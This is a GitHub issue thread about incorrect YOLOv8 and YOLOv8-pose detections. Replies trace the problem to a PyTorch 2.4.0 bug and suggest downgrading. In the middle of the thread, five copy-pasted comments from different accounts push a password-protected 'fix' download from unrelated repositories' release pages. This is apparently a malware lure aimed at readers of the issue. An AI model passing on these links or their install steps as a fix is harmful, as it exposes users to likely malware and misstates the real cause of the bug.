### ISSUE TITLE
Yolov8 and Yolov8 Pose issue incorrect detection

### ISSUE THREAD

**Issue by Matyudod** [ultralytics/ultralytics#15875]
### Search before asking

- [X] I have searched the Ultralytics YOLO [issues](https://github.com/ultralytics/ultralytics/issues) and found no similar bug report.

### Bug

Hi Team,
In yesterday and today, I see when I try any model of yolov8 and yolov8-pose, the results is incorrect.
![image](https://github.com/user-attachments/assets/c6d98055-0693-42fe-b634-8b3d25e02ab9)
I have attached the reproduce below.
Please help me check it.
Thanks

### Environment

Ultralytics YOLOv8.2.83 🚀 Python-3.11.8 torch-2.4.0+cpu CPU (Intel Core(TM) i5-10400 2.90GHz)
Setup complete ✅ (12 CPUs, 15.8 GB RAM, 157.6/631.5 GB disk)

OS                  Windows-10-10.0.22621-SP0
Environment         Windows
Python              3.11.8
Install             git
RAM                 15.79 GB
CPU                 Intel Core(TM) i5-10400 2.90GHz
CUDA                None

numpy               ✅ 1.26.4<2.0.0,>=1.23.0
matplotlib          ✅ 3.9.2>=3.3.0
opencv-python       ✅ 4.10.0.84>=4.6.0
pillow              ✅ 10.4.0>=7.1.2
pyyaml              ✅ 6.0.2>=5.3.1
requests            ✅ 2.28.2>=2.23.0
scipy               ✅ 1.14.1>=1.4.1
torch               ✅ 2.4.0>=1.8.0
torchvision         ✅ 0.19.0>=0.9.0
tqdm                ✅ 4.65.2>=4.64.0
psutil              ✅ 6.0.0
py-cpuinfo          ✅ 9.0.0
pandas              ✅ 2.2.2>=1.1.4
seaborn             ✅ 0.13.2>=0.11.0
ultralytics-thop    ✅ 2.0.5>=2.0.0

### Minimal Reproducible Example

```
from ultralytics import YOLO
from ultralytics.utils import ASSETS
from ultralytics.models.yolo.pose import PosePredictor

model = YOLO("yolov8n-pose.pt")
filename = 'a.jpg'
results = model(filename)
results[0].show()
```

### Are you willing to submit a PR?

- [ ] Yes I'd like to help by submitting a PR!

**Comment by Amrithesh-k** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Jostino** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Jostino** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Y-T-G** [comment]
It's a PyTorch bug with 2.4.0.

https://github.com/ultralytics/ultralytics/issues/15049

**Comment by Matyudod** [comment]
That's best information
Thanks for your support

**Comment by Matyudod** [comment]
Issue is relating PyTorch 2.4.0.

https://github.com/ultralytics/ultralytics/issues/15049

**Comment by glenn-jocher** [comment]
@Matyudod thank you for pointing that out. Please try downgrading to an earlier version of PyTorch to see if it resolves the issue.
